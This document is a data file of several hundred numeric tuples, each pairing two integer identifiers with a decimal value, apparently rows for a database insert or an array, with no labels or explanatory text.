(159, 189277, 8.36019),
(161, 189614, 0.88669),
(267, 189614, 0.88669),
(304, 189614, 0.88669),
(161, 189615, 1.09669),
(161, 189616, 0.91),
(161, 189617, 1.02669),
(161, 189618, 0.14),
(161, 189619, 1.05),
(161, 189620, 1.16669),
(161, 189621, 0.18669),
(161, 189622, 0.98),
(161, 189623, 1.23669),
(161, 189624, 0.23331),
(161, 189625, 0.93331),
(161, 189626, 1.12),
(161, 189627, 0.93331),
(161, 189628, 1.07331),
(161, 189629, 0.95669),
(161, 189630, 1.07331),
(161, 189631, 0.56),
(161, 189632, 1.19),
(161, 189633, 1.33),
(161, 189634, 1.05),
(161, 189635, 0.91),
(161, 189636, 1.02669),
(161, 189637, 0.51331),
(161, 189638, 1.16669),
(161, 189639, 1.30669),
(161, 189640, 1.00331),
(161, 189641, 1.16669),
(161, 189642, 1.05),
(161, 189643, 1.30669),
(168, 198038, 0.88669),
(168, 198039, 0.93331),
(168, 198040, 1.07331),
(168, 198041, 1.16669),
(174, 198042, 0.32669),
(168, 198042, 0.65338),
(168, 198043, 1.05),
(168, 198044, 1.14331),
(168, 198045, 1.05),
(168, 198046, 1.14331),
(168, 198047, 1.05),
(168, 198048, 0.98),
(168, 198049, 1.09669),
(168, 198050, 0.91),
(168, 198051, 1.00331),
(168, 198052, 0.88669),
(168, 198053, 0.98),
(168, 198054, 0.88669),
(168, 198055, 0.98),
(268, 198056, 0.14),
(168, 198056, 0.48),
(178, 198056, 0.48),
(294, 198056, 0.48),
(168, 198057, 3.28008),
(178, 198057, 3.28008),
(294, 198057, 3.28008),
(168, 198058, 3.91992),
(178, 198058, 3.91992),
(294, 198058, 3.91992),
(168, 198059, 1.12),
(168, 198060, 1.19),
(174, 201236, 0.28),
(273, 201236, 0.28),
(178, 201236, 0.56),
(174, 215542, 0.93331),
(174, 215543, 1.12),
(174, 215544, 0.93331),
(174, 215545, 1.12),
(174, 215546, 1.02669),
(174, 215547, 1.02669),
(174, 215548, 1.12),
(174, 215549, 1.00331),
(174, 215550, 1.12),
(174, 215551, 0.88669),
(174, 215552, 0.95669),
(174, 215553, 1.00331),
(174, 215554, 0.88669),
(174, 215555, 1.00331),
(174, 215556, 0.91),
(274, 215556, 0.91),
(174, 215557, 0.98),
(174, 215558, 0.91),
(174, 215559, 1.00331),
(174, 215560, 1.12),
(174, 215561, 1.05),
(174, 215562, 0.93331),
(174, 215563, 1.05),
(262, 217434, 0.86331),
(267, 217434, 0.86331),
(305, 217434, 0.86331),
(262, 217444, 0.86331),
(272, 217444, 0.86331),
(280, 217444, 0.86331),
(288, 217456, 0.88669),
(262, 217456, 1.77338),
(272, 217456, 1.77338),
(280, 217456, 1.77338),
(262, 217486, 0.91),
(263, 217486, 0.91),
(178, 222226, 0.98),
(178, 222227, 0.88669),
(178, 222228, 0.95669),
(178, 222229, 0.86331),
(178, 222230, 1.02669),
(178, 222231, 1.02669),
(178, 222232, 1.12),
(178, 222233, 0.86331),
(178, 222234, 1.00331),
(178, 222235, 0.91),
(178, 222236, 1.14331),
(178, 222237, 0.88669),
(178, 222238, 0.98),
(178, 222239, 1.05),
(178, 222240, 1.21331),
(178, 222241, 0.28),
(178, 222242, 0.93331),
(178, 222243, 1.09669),
(178, 222244, 0.56),
(178, 222245, 1.07331),
(178, 222246, 1.26),
(178, 222247, 0.91),
(178, 222248, 0.95669),
(178, 222249, 0.88669),
(178, 222250, 0.98),
(178, 222251, 0.88669),
(178, 222252, 0.93331),
(178, 222253, 0.42),
(178, 222254, 1.00331),
(178, 222255, 1.09669),
(178, 222256, 0.88669),
(178, 222257, 0.98),
(178, 222258, 0.88669),
(178, 222259, 0.98),
(178, 222260, 0.28),
(178, 222261, 1.02669),
(178, 222262, 1.09669),
(178, 222263, 0.91),
(178, 222264, 1.07331),
(178, 222265, 0.81669),
(178, 222266, 0.91),
(178, 222267, 0.93331),
(178, 222268, 0.79331),
(178, 222269, 0.86331),
(178, 222270, 0.88669),
(178, 222271, 0.79331),
(178, 222272, 0.88669),
(178, 222273, 0.98),
(178, 222274, 1.05),
(178, 222275, 0.18669),
(292, 222275, 0.18669),
(178, 222276, 0.84),
(178, 222277, 0.93331),
(178, 222278, 1.07331),
(178, 222279, 1.16669),
(178, 222280, 0.32669),
(272, 222280, 0.32669),
(280, 222280, 0.32669),
(178, 222281, 0.98),
(178, 222282, 1.16669),
(178, 222283, 0.23331),
(178, 222284, 0.93331),
(178, 222285, 1.00331),
(178, 222286, 1.02669),
(178, 222287, 0.65338),
(178, 222288, 1.96),
(178, 222289, 2.19338),
(178, 222290, 1.11993),
(178, 222291, 1.00331),
(178, 222292, 1.07331),
(178, 222293, 1.07331),
(178, 222294, 1.16669),
(178, 222295, 1.00331),
(178, 222296, 1.12),
(178, 222297, 0.37338),
(178, 222298, 0.86331),
(178, 222299, 1.00331),
(178, 222300, 0.88669),
(178, 222301, 0.98),
(178, 222302, 0.18669),
(178, 222303, 0.91),
(178, 222304, 1.02669),
(178, 222305, 0.51331),
(178, 222306, 1.02669),
(178, 222307, 1.16669),
(178, 222308, 0.37331),
(178, 222309, 0.95669),
(178, 222310, 1.07331),
(178, 222311, 0.86331),
(178, 222312, 1.02669),
(178, 222313, 0.98),
(178, 222314, 1.09669),
(178, 222315, 1.19),
(178, 222316, 0.95669),
(178, 222317, 1.09669),
(178, 222318, 1.07331),
(178, 222319, 1.23669),
(273, 222320, 0.91),
(178, 222320, 1.82),
(178, 222321, 2.24),
(178, 222322, 0.74662),
(178, 222323, 1.00331),
(178, 222324, 1.09669),
(178, 222325, 1.05),
(178, 222326, 1.12),
(178, 222327, 0.91),
(178, 222328, 1.02669),
(178, 222329, 0.37331),
(178, 222330, 0.98),
(178, 222331, 1.14331),
(178, 222332, 6.04317),
(178, 222333, 0.95669),
(178, 222334, 0.98),
(178, 222335, 1.00331),
(178, 222336, 2.79993),
(178, 222337, 1.00331),
(178, 222338, 0.91),
(178, 222339, 1.16669),
(178, 222340, 0.86331),
(178, 222341, 0.93331),
(178, 222342, 0.91),
(178, 222343, 1.02669),
(178, 222344, 0.86331),
(178, 222345, 0.93331),
(178, 222346, 0.86331),
(178, 222347, 0.93331),
(178, 222348, 0.95669),
(178, 222349, 1.02669),
(178, 222350, 0.84),
(178, 222351, 0.98),
(178, 222352, 0.91),
(178, 222353, 1.07331),
(178, 222354, 0.93331),
(178, 222355, 1.05),
(178, 222356, 1.91338),
(178, 222357, 1.07331),
(178, 222358, 1.12),
(178, 222359, 0.98),
(178, 222360, 1.07331),
(178, 222361, 0.88669),
(178, 222362, 1.00331),
(178, 222363, 0.91),
(178, 222364, 0.98),
(178, 222365, 0.84),
(290, 222365, 0.84),
(178, 222366, 1.00331),
(178, 222367, 0.86331),
(178, 222368, 0.98),
(178, 222369, 1.07331),
(178, 222370, 4.31655),
(178, 222371, 1.09669),
(178, 222372, 0.95669),
(178, 222373, 0.95669),
(178, 222374, 1.00331),
(178, 222375, 1.35331),
(178, 222376, 0.88669),
(178, 222377, 1.07331),
(178, 222378, 0.88669),
(178, 222379, 1.05),
(248, 233597, 0.37331),
(273, 233597, 0.37331),
(270, 236709, 0.86331),
(272, 236709, 0.86331),
(280, 236709, 0.86331),
(301, 236709, 0.86331),
(270, 236710, 0.98),
(272, 236710, 0.98),
(280, 236710, 0.98),
(301, 236710, 0.98),
(268, 236730, 0.86331),
(270, 236730, 0.86331),
(272, 236730, 0.86331),
(280, 236730, 0.86331),
(301, 236730, 0.86331),
(193, 238979, 0.91),
(193, 238980, 1.14331),
(193, 238981, 0.91),
(193, 238982, 1.02669),
(193, 238983, 0.91),
(193, 238984, 1.00331),
(193, 238985, 0.98),
(193, 238986, 1.00331),
(193, 238987, 0.95669),
(193, 238988, 1.00331),
(193, 238989, 0.93331),
(273, 238989, 0.93331),
(193, 238990, 0.98),
(193, 238991, 1.07331),
(193, 238992, 1.05),
(193, 238993, 0.37331),
(290, 238993, 0.37331),
(193, 238994, 1.02669),
(193, 238995, 1.12),
(193, 238996, 0.95669),
(193, 238997, 1.19),
(193, 238998, 0.88669),
(193, 238999, 1.00331),
(193, 239000, 1.07331),
(193, 239001, 1.16669),
(193, 239002, 1.02669),
(193, 239003, 1.14331),
(193, 239004, 0.91),
(193, 239005, 1.00331),
(193, 239006, 1.02669),
(193, 239007, 1.12),
(193, 239008, 2.14662),
(193, 239009, 2.28662),
(193, 239010, 1.12),
(267, 240531, 0.23331),
(274, 240531, 0.23331),
(270, 250571, 1.05),
(301, 250571, 1.05),
(270, 250572, 0.91),
(301, 250572, 0.91),
(270, 250573, 0.95669),
(301, 250573, 0.95669),
(292, 250574, 0.32669),
(270, 250574, 0.98007),
(301, 250574, 0.98007),
(270, 250575, 0.93331),
(301, 250575, 0.93331),
(270, 250576, 1.09669),
(301, 250576, 1.09669),
(270, 250577, 0.98),
(301, 250577, 0.98),
(270, 250578, 1.09669),
(301, 250578, 1.09669),
(270, 250579, 1.02669),
(301, 250579, 1.02669),
(270, 250580, 1.12),
(301, 250580, 1.12),
(270, 250581, 0.88669),
(301, 250581, 0.88669),
(270, 250582, 0.98),
(301, 250582, 0.98),
(270, 250583, 1.07331),
(301, 250583, 1.07331),
(270, 250584, 1.00331),
(301, 250584, 1.00331),
(270, 250585, 1.09669),
(301, 250585, 1.09669),
(270, 250586, 0.91),
(301, 250586, 0.91),
(270, 250587, 1.09669),
(301, 250587, 1.09669),
(270, 250588, 0.91),
(301, 250588, 0.91),
(270, 250589, 0.98),
(301, 250589, 0.98),
(270, 250590, 1.14331),
(301, 250590, 1.14331),
(265, 251200, 0.98),
(266, 251200, 0.98),
(265, 251201, 1.05),
(266, 251201, 1.05),
(265, 251202, 1.14331),
(266, 251202, 1.14331),
(265, 251203, 0.84),
(266, 251203, 0.84),
(265, 251204, 0.91),
(266, 251204, 0.91),
(265, 251205, 0.37331),
(266, 251205, 0.37331),
(265, 251206, 1.12),
(266, 251206, 1.12),
(265, 251207, 1.23669),
(266, 251207, 1.23669),
(265, 251208, 0.93331),
(266, 251208, 0.93331),
(265, 251209, 1.05),
(266, 251209, 1.05),
(265, 251210, 0.93331),
(266, 251210, 0.93331),
(265, 251211, 1.05),
(266, 251211, 1.05),
(272, 253403, 0.98),
(280, 253403, 0.98),
(272, 253404, 1.28331),
(280, 253404, 1.28331),
(272, 253405, 1.12),
(280, 253405, 1.12),
(272, 253406, 1.07331),
(280, 253406, 1.07331),
(272, 253407, 1.05),
(280, 253407, 1.05),
(272, 253408, 1.07331),
(280, 253408, 1.07331),
(272, 253409, 1.12),
(280, 253409, 1.12),
(272, 253410, 1.05),
(280, 253410, 1.05),
(272, 253411, 0.88669),
(280, 253411, 0.88669),
(272, 253412, 0.88669),
(280, 253412, 0.88669),
(272, 253413, 2.1),
(280, 253413, 2.1),
(272, 253414, 0.95669),
(280, 253414, 0.95669),
(272, 253415, 1.12),
(280, 253415, 1.12),
(272, 253416, 0.98),
(280, 253416, 0.98),
(272, 253417, 1.07331),
(280, 253417, 1.07331),
(272, 253418, 0.93331),
(273, 253418, 0.93331),
(280, 253418, 0.93331),
(306, 253418, 0.93331),
(272, 253422, 1.05),
(280, 253422, 1.05),
(272, 253423, 1.21331),
(280, 253423, 1.21331),
(272, 253424, 0.93331),
(280, 253424, 0.93331),
(272, 253425, 1.02669),
(280, 253425, 1.02669),
(272, 253426, 1.07331),
(280, 253426, 1.07331),
(272, 253427, 0.95669),
(280, 253427, 0.95669),
(272, 253428, 1.05),
(280, 253428, 1.05),
(272, 253429, 0.93331),
(280, 253429, 0.93331),
(272, 253430, 1.14331),
(280, 253430, 1.14331),
(272, 253431, 0.98),
(280, 253431, 0.98),
(272, 253432, 1.05),
(280, 253432, 1.05),
(272, 253433, 1.14331),
(280, 253433, 1.14331),
(272, 253434, 1.00331),
(280, 253434, 1.00331),
(272, 253435, 1.23669),
(280, 253435, 1.23669),
(272, 253436, 0.28),
(280, 253436, 0.28),
(272, 253437, 0.93331),
(280, 253437, 0.93331),
(272, 253438, 1.00331),
(280, 253438, 1.00331),
(273, 256323, 1.02669),
(273, 256324, 1.09669),
(273, 256325, 0.88669),
(273, 256326, 1.05),
(273, 256327, 1.05),
(273, 256328, 0.98),
(273, 256329, 1.07331),
(273, 256330, 1.00331),
(273, 256331, 1.09669),
(273, 256332, 0.84),
(273, 256333, 0.91),
(273, 256334, 0.88669),
(273, 256335, 1.00331),
(273, 256336, 0.84),
(273, 256337, 1.00331),
(273, 256338, 0.86331),
(273, 256339, 1.02669),
(273, 256340, 0.98),
(273, 256341, 1.07331),
(273, 256342, 0.95669),
(273, 256343, 1.09669),
(273, 256344, 0.95669),
(273, 256345, 1.02669),
(273, 256346, 1.05),
(233, 266581, 0.60669),
(288, 266581, 0.60669),
(306, 266581, 0.60669),
(233, 266582, 1.09669),
(233, 266583, 1.21331),
(233, 266584, 0.32669),
(233, 266585, 0.98),
(233, 266586, 1.12),
(233, 266587, 0.23331),
(233, 266588, 0.91),
(233, 266589, 1.00331),
(233, 266590, 2.00662),
(233, 266591, 2.28662),
(233, 266592, 1.05),
(233, 266593, 0.32669),
(233, 266594, 0.91),
(233, 266595, 1.09669),
(233, 266596, 0.93331),
(233, 266597, 1.02669),
(235, 267818, 0.88669),
(235, 267819, 1.00331),
(235, 267820, 1.05),
(235, 267821, 1.23669),
(235, 267822, 1.19),
(235, 267823, 1.12),
(235, 267824, 0.91),
(235, 267825, 1.00331),
(235, 267826, 1.00331),
(235, 267827, 1.07331),
(235, 267828, 1.02669),
(235, 267829, 1.12),
(235, 267830, 1.12),
(235, 267831, 2.1),
(235, 267832, 1.35331),
(235, 267833, 1.37669),
(235, 267834, 0.91),
(235, 267835, 1.00331),
(235, 267836, 0.86331),
(235, 267837, 1.02669),
(235, 267838, 1.02669),
(235, 267839, 0.98),
(235, 267840, 0.93331),
(235, 267841, 1.14331),
(235, 267842, 1.14331),
(235, 267843, 0.91),
(235, 267844, 1.05),
(236, 268929, 0.88669),
(236, 268930, 1.07331),
(236, 268931, 0.84),
(236, 268932, 0.91),
(236, 268933, 0.98),
(236, 268934, 0.32669),
(236, 268935, 0.93331),
(236, 268936, 1.02669),
(236, 268937, 0.91),
(236, 268938, 1.05),
(236, 268939, 1.00331),
(236, 268940, 0.32669),
(306, 268940, 0.32669),
(236, 268941, 0.93331),
(236, 268942, 1.07331),
(236, 268943, 1.09669),
(236, 268944, 1.28331),
(236, 268945, 0.88669),
(236, 268946, 1.00331),
(236, 268947, 0.98),
(236, 268948, 1.14331),
(236, 268949, 0.37331),
(304, 268949, 0.37331),
(236, 268950, 1.00331),
(236, 268951, 1.19),
(236, 268952, 0.32669),
(292, 268952, 0.32669),
(236, 268953, 0.95669),
(236, 268954, 1.07331),
(236, 268955, 0.32669),
(236, 268956, 0.93331),
(236, 268957, 1.07331),
(237, 269698, 0.98),
(304, 269698, 0.98),
(237, 269699, 1.00331),
(237, 269700, 0.88669),
(237, 269701, 1.09669),
(237, 269702, 0.95669),
(237, 269703, 1.02669),
(237, 269704, 1.02669),
(237, 269705, 1.86662),
(237, 269706, 2.05338),
(237, 269707, 0.95669),
(237, 269708, 1.02669),
(237, 269709, 0.91),
(290, 269709, 1.82),
(237, 269710, 1.05),
(237, 269711, 1.05),
(238, 271133, 1.00331),
(238, 271134, 1.16669),
(238, 271135, 1.12),
(238, 271136, 0.84),
(288, 271136, 0.84),
(238, 271137, 0.98),
(238, 271138, 0.98),
(238, 271139, 1.09669),
(238, 271140, 0.93331),
(238, 271141, 1.07331),
(238, 271142, 1.86662),
(238, 271143, 2.14662),
(238, 271144, 1.00331),
(238, 271145, 1.05),
(238, 271146, 1.02669),
(238, 271147, 1.16669),
(238, 271148, 0.86331),
(238, 271149, 0.95669),
(238, 271150, 0.28),
(238, 271151, 0.93331),
(238, 271152, 1.02669),
(238, 271153, 0.32669),
(238, 271154, 1.02669),
(238, 271155, 1.21331),
(238, 271156, 0.37331),
(238, 271157, 0.98),
(238, 271158, 1.16669),
(238, 271159, 0.86331),
(238, 271160, 0.98),
(238, 271161, 0.42),
(238, 271162, 0.98),
(238, 271163, 1.21331),
(238, 271164, 1.09669),
(238, 271165, 0.98),
(238, 271166, 0.98),
(239, 273179, 1.02669),
(239, 273180, 1.19),
(239, 273181, 0.95669),
(239, 273182, 1.02669),
(239, 273183, 1.4),
(239, 273184, 0.98),
(239, 273185, 1.05),
(239, 273186, 0.28),
(239, 273187, 1.02669),
(239, 273188, 1.12),
(239, 273189, 1.05),
(239, 273190, 1.23669),
(239, 273191, 0.42),
(239, 273192, 1.09669),
(239, 273193, 1.23669),
(239, 273194, 0.86331),
(239, 273195, 0.98),
(239, 273196, 1.07331),
(239, 273197, 0.84),
(239, 273198, 0.98),
(239, 273199, 0.88669),
(239, 273200, 1.09669),
(239, 273201, 0.86331),
(292, 273201, 0.86331),
(239, 273202, 0.91),
(239, 273203, 0.42),
(239, 273204, 0.98),
(239, 273205, 1.07331),
(239, 273206, 0.98),
(239, 273207, 1.12),
(239, 273208, 0.98),
(239, 273209, 1.09669),
(239, 273210, 0.46669),
(239, 273211, 1.07331),
(239, 273212, 1.19),
(239, 273213, 2.55),
(239, 273214, 0.28),
(239, 273215, 0.98),
(239, 273216, 1.05),
(239, 273217, 0.93331),
(239, 273218, 1.02669),
(239, 273219, 1.12),
(239, 273220, 1.14331),
(239, 273221, 1.16669),
(239, 273222, 0.95669),
(239, 273223, 1.09669),
(239, 273224, 0.98),
(305, 273224, 0.98),
(239, 273225, 1.09669),
(239, 273226, 1.91338),
(239, 273227, 1.00331),
(239, 273228, 0.91),
(239, 273229, 1.00331),
(240, 275360, 0.95669),
(240, 275361, 1.05),
(240, 275362, 1.00331),
(240, 275363, 0.91),
(240, 275364, 0.98),
(240, 275365, 1.05),
(240, 275366, 1.16669),
(240, 275367, 0.93331),
(240, 275368, 1.02669),
(240, 275369, 0.98),
(240, 275370, 1.05),
(240, 275371, 1.07331),
(240, 275372, 0.98),
(240, 275373, 1.07331),
(240, 275374, 1.14331),
(240, 275375, 0.95669),
(240, 275376, 1.21331),
(240, 275377, 1.02669),
(240, 275378, 1.09669),
(240, 275379, 1.12),
(240, 275380, 1.26),
(240, 275381, 0.98),
(240, 275382, 1.96),
(240, 275383, 0.88669),
(240, 275384, 1.05),
(240, 275385, 1.05),
(304, 275385, 1.05),
(240, 275386, 0.32669),
(240, 275387, 0.93331),
(240, 275388, 1.02669),
(240, 275389, 2.55),
(240, 275390, 1.02669),
(240, 275391, 1.09669),
(240, 275392, 0.91),
(240, 275393, 1.02669),
(240, 275394, 1.02669),
(240, 275395, 1.14331),
(240, 275396, 1.05),
(240, 275397, 1.14331),
(240, 275398, 1.05),
(240, 275399, 0.93331),
(240, 275400, 1.07331),
(240, 275401, 1.12),
(240, 275402, 0.37331),
(240, 275403, 1.07331),
(240, 275404, 1.21331),
(240, 275405, 0.93331),
(240, 275406, 1.02669),
(240, 275407, 2.24),
(240, 275408, 0.88669),
(240, 275409, 1.09669),
(240, 275410, 1.00331),
(240, 275411, 1.00331),
(240, 275412, 0.91),
(240, 275413, 1.07331),
(240, 275414, 1.00331),
(240, 275415, 1.12),
(240, 275416, 0.93331),
(288, 275416, 0.93331),
(240, 275417, 1.05),
(240, 275418, 1.02669),
(241, 276973, 1.05),
(241, 276974, 0.95669),
(241, 276975, 1.09669),
(241, 276976, 1.00331),
(241, 276977, 0.88669),
(241, 276978, 0.95669),
(241, 276979, 1.05),
(241, 276980, 1.19),
(241, 276981, 0.18669),
(241, 276982, 0.91),
(241, 276983, 1.05),
(241, 276984, 0.86331),
(241, 276985, 0.98),
(241, 276986, 0.88669),
(241, 276987, 1.02669),
(241, 276988, 0.95669),
(241, 276989, 0.91),
(241, 276990, 1.00331),
(241, 276991, 1.02669),
(241, 276992, 1.14331),
(242, 278601, 0.88669),
(242, 278602, 1.07331),
(242, 278603, 0.86331),
(242, 278604, 1.05),
(242, 278605, 1.07331),
(242, 278606, 0.37338),
(242, 278607, 0.95669),
(242, 278608, 1.05),
(242, 278609, 0.93331),
(242, 278610, 1.07331),
(242, 278611, 0.88669),
(242, 278612, 1.02669),
(242, 278613, 0.93331),
(242, 278614, 1.12),
(242, 278615, 0.84),
(242, 278616, 0.95669),
(242, 278617, 0.98),
(242, 278618, 0.98),
(242, 278619, 1.00331),
(242, 278620, 1.09669),
(242, 278621, 1.21331),
(242, 278622, 0.93331),
(242, 278623, 1.07331),
(242, 278624, 0.91),
(242, 278625, 1.07331),
(242, 278626, 1.00331),
(242, 278627, 1.12),
(242, 278628, 1.02669),
(242, 278629, 1.12),
(242, 278630, 0.95669),
(242, 278631, 1.02669),
(242, 278632, 1.09669),
(242, 278633, 1.19),
(242, 278634, 0.93331),
(242, 278635, 1.21331),
(242, 278636, 0.37331),
(242, 278637, 1.02669),
(242, 278638, 1.12),
(242, 278639, 1.77338),
(242, 278640, 1.05),
(242, 278641, 1.09669),
(242, 278642, 0.88669),
(242, 278643, 1.00331),
(242, 278644, 0.91),
(242, 278645, 1.00331),
(242, 278646, 0.95669),
(242, 278647, 1.14331),
(242, 278648, 0.98),
(242, 278649, 1.05),
(242, 278650, 0.98),
(242, 278651, 1.05),
(242, 278652, 0.93331),
(242, 278653, 1.07331),
(242, 278654, 0.93331),
(242, 278655, 1.02669),
(242, 278656, 0.98),
(242, 278657, 0.95669),
(242, 278658, 1.05),
(242, 278659, 0.88669),
(242, 278660, 0.98),
(242, 278661, 1.05),
(242, 278662, 0.88669),
(242, 278663, 0.95669),
(242, 278664, 0.81669),
(242, 278665, 0.93331),
(242, 278666, 0.91),
(242, 278667, 0.98),
(242, 278668, 0.86331),
(242, 278669, 0.98),
(242, 278670, 1.14331),
(242, 278671, 0.46669),
(242, 278672, 1.05),
(242, 278673, 1.16669),
(242, 278674, 2.55),
(242, 278675, 0.95669),
(242, 278676, 1.05),
(242, 278677, 1.91338),
(242, 278678, 2.14662),
(242, 278679, 1.00331),
(242, 278680, 1.19),
(242, 278681, 0.93331),
(242, 278682, 1.02669),
(242, 278683, 0.86331),
(242, 278684, 0.98),
(242, 278685, 1.12),
(242, 278686, 0.91),
(242, 278687, 1.12),
(305, 278688, 0.95669),
(242, 278688, 1.91338),
(242, 278689, 1.19),
(242, 278690, 1.09669),
(242, 278691, 1.00331),
(242, 278692, 0.93331),
(242, 278693, 1.14331),
(242, 278694, 1.09669),
(242, 278695, 1.16669),
(242, 278696, 0.98),
(242, 278697, 1.09669),
(242, 278698, 0.95669),
(242, 278699, 1.07331),
(242, 278700, 1.00331),
(242, 278701, 1.09669),
(242, 278702, 1.02669),
(242, 278703, 1.16669),
(242, 278704, 0.32669),
(242, 278705, 1.00331),
(242, 278706, 1.21331),
(243, 282236, 0.98),
(243, 282237, 1.09669),
(243, 282238, 1.07331),
(243, 282239, 0.93331),
(243, 282240, 1.09669),
(243, 282241, 0.88669),
(243, 282242, 1.00331),
(243, 282243, 0.86331),
(243, 282244, 0.93331),
(243, 282245, 1.05),
(243, 282246, 1.19),
(243, 282247, 0.86331),
(243, 282248, 0.95669),
(243, 282249, 0.91),
(243, 282250, 1.12),
(243, 282251, 1.21331),
(243, 282252, 1.07331),
(243, 282253, 0.37331),
(243, 282254, 1.02669),
(243, 282255, 1.14331),
(243, 282256, 0.88669),
(243, 282257, 0.98),
(243, 282258, 0.88669),
(243, 282259, 1.00331),
(243, 282260, 1.00331),
(243, 282261, 1.12),
(243, 282262, 1.00331),
(243, 282263, 1.07331),
(243, 282264, 0.95669),
(243, 282265, 1.16669),
(243, 282266, 0.95669),
(243, 282267, 1.00331),
(243, 282268, 1.07331),
(243, 282269, 7.98),
(244, 284114, 1.00331),
(244, 284115, 0.86331),
(244, 284116, 0.98),
(244, 284117, 1.00331),
(244, 284118, 0.84),
(244, 284119, 0.98),
(244, 284120, 0.84),
(290, 284120, 1.68),
(244, 284121, 1.00331),
(244, 284122, 0.51331),
(244, 284123, 1.02669),
(244, 284124, 1.19),
(244, 284125, 0.95669),
(244, 284126, 1.07331),
(244, 284127, 1.96),
(244, 284128, 0.86331),
(244, 284129, 0.93331),
(244, 284130, 0.91),
(244, 284131, 1.00331),
(244, 284132, 0.28),
(244, 284133, 1.07331),
(244, 284134, 1.12),
(244, 284135, 0.86331),
(244, 284136, 0.93331),
(244, 284137, 1.02669),
(244, 284138, 0.98),
(244, 284139, 1.12),
(244, 284140, 0.95669),
(244, 284141, 1.07331),
(244, 284142, 0.91),
(244, 284143, 1.00331),
(245, 284948, 1.02669),
(245, 284949, 1.12),
(245, 284950, 1.07331),
(245, 284951, 0.91),
(245, 284952, 1.02669),
(245, 284953, 0.91),
(245, 284954, 0.98),
(245, 284955, 0.93331),
(245, 284956, 1.07331),
(245, 284957, 1.02669),
(245, 284958, 1.09669),
(245, 284959, 0.23331),
(245, 284960, 0.86331),
(245, 284961, 0.93331),
(245, 284962, 0.95669),
(245, 284963, 1.12),
(245, 284964, 0.93331),
(245, 284965, 1.16669),
(245, 284966, 0.91),
(245, 284967, 1.02669),
(245, 284968, 1.86662),
(245, 284969, 1.07331),
(245, 284970, 1.05),
(245, 284971, 1.72662),
(245, 284972, 1.05),
(245, 284973, 0.98),
(245, 284974, 1.00331),
(245, 284975, 1.28331),
(245, 284976, 1.02669),
(245, 284977, 1.09669),
(245, 284978, 0.98),
(245, 284979, 0.91),
(245, 284980, 1.05),
(246, 285650, 1.14331),
(246, 285651, 1.26),
(246, 285652, 0.32669),
(246, 285653, 0.93331),
(246, 285654, 1.07331),
(246, 285655, 0.93331),
(246, 285656, 1.02669),
(246, 285657, 0.28),
(246, 285658, 0.98),
(246, 285659, 1.07331),
(246, 285660, 1.05),
(246, 285661, 0.98),
(246, 285662, 1.16669),
(246, 285663, 1.00331),
(246, 285664, 1.16669),
(246, 285665, 0.18669),
(246, 285666, 0.93331),
(246, 285667, 1.09669),
(246, 285668, 1.02669),
(246, 285669, 1.12),
(246, 285670, 0.23331),
(246, 285671, 0.88669),
(246, 285672, 1.00331),
(246, 285673, 1.05),
(246, 285674, 1.14331),
(247, 286613, 0.98),
(247, 286614, 0.88669),
(247, 286615, 0.95669),
(247, 286616, 0.86331),
(247, 286617, 1.00331),
(247, 286618, 0.91),
(247, 286619, 1.05),
(247, 286620, 0.95669),
(247, 286621, 0.95669),
(247, 286622, 1.19),
(247, 286623, 0.32669),
(247, 286624, 1.00331),
(247, 286625, 1.09669),
(247, 286626, 1.12),
(247, 286627, 1.00331),
(247, 286628, 1.09669),
(247, 286629, 0.51331),
(247, 286630, 1.00331),
(247, 286631, 1.07331),
(247, 286632, 1.00331),
(247, 286633, 0.86331),
(247, 286634, 1.09669),
(247, 286635, 0.98),
(247, 286636, 1.09669),
(247, 286637, 0.91),
(247, 286638, 1.00331),
(248, 287568, 0.93331),
(305, 287568, 0.93331),
(248, 287569, 0.93331),
(248, 287570, 1.05),
(248, 287571, 1.02669),
(248, 287572, 1.12),
(248, 287573, 1.00331),
(248, 287574, 1.07331),
(248, 287575, 1.07331),
(248, 287576, 1.30669),
(248, 287577, 0.98),
(248, 287578, 1.07331),
(248, 287579, 0.32669),
(248, 287580, 1.00331),
(248, 287581, 1.07331),
(248, 287582, 1.14331),
(248, 287583, 0.98),
(248, 287584, 1.12),
(248, 287585, 0.93331),
(248, 287586, 1.05),
(248, 287587, 0.98),
(248, 287588, 1.09669),
(248, 287589, 0.37331),
(288, 287589, 0.37331),
(248, 287590, 0.95669),
(248, 287591, 1.19),
(248, 287592, 0.91),
(248, 287593, 1.00331),
(248, 287594, 1.14331),
(248, 287595, 1.26),
(248, 287596, 1.09669),
(249, 288631, 0.88669),
(249, 288632, 0.95669),
(249, 288633, 1.00331),
(249, 288634, 1.09669),
(249, 288635, 0.91),
(249, 288636, 1.09669),
(249, 288637, 0.93331),
(249, 288638, 1.07331),
(249, 288639, 0.86331),
(249, 288640, 0.98),
(249, 288641, 1.02669),
(249, 288642, 1.09669),
(249, 288643, 0.93331),
(249, 288644, 1.05),
(249, 288645, 0.91),
(249, 288646, 1.12),
(249, 288647, 0.93331),
(249, 288648, 1.12),
(249, 288649, 0.86331),
(249, 288650, 0.95669),
(249, 288651, 0.95669),
(250, 289367, 0.14),
(250, 289368, 0.88669),
(250, 289369, 1.02669),
(250, 289370, 0.18669),
(250, 289371, 0.93331),
(250, 289372, 1.12),
(250, 289373, 7.22019),
(250, 289374, 8.16981),
(251, 289430, 0.23331),
(251, 289431, 0.88669),
(251, 289432, 0.98),
(251, 289433, 0.28),
(251, 289434, 0.93331),
(251, 289435, 1.09669),
(251, 289436, 0.86331),
(251, 289437, 1.02669),
(252, 289798, 1.02669),
(252, 289799, 1.23669),
(252, 289800, 1.05),
(252, 289801, 1.02669),
(252, 289802, 1.09669),
(252, 289803, 0.88669),
(252, 289804, 0.98),
(252, 289805, 0.98),
(252, 289806, 1.02669),
(252, 289807, 1.09669),
(252, 289808, 0.95669),
(252, 289809, 1.05),
(252, 289810, 0.93331),
(252, 289811, 1.02669),
(252, 289812, 2.1),
(252, 289813, 0.95669),
(252, 289814, 1.07331),
(253, 290898, 7.02981),
(253, 290899, 10.0702),
(253, 290900, 1.05),
(253, 290901, 0.91),
(253, 290902, 1.02669),
(253, 290903, 0.93331),
(253, 290904, 1.02669),
(253, 290905, 1.14331),
(253, 290906, 0.84),
(253, 290907, 1.05),
(253, 290908, 0.98),
(253, 290909, 1.72662),
(253, 290910, 2.00662),
(253, 290911, 0.93331),
(253, 290912, 1.12),
(253, 290913, 0.98),
(253, 290914, 0.93331),
(253, 290915, 1.09669),
(253, 290916, 0.84),
(253, 290917, 1.05),
(253, 290918, 1.00331),
(253, 290919, 1.28331),
(253, 290920, 1.00331),
(253, 290921, 0.91),
(253, 290922, 0.98),
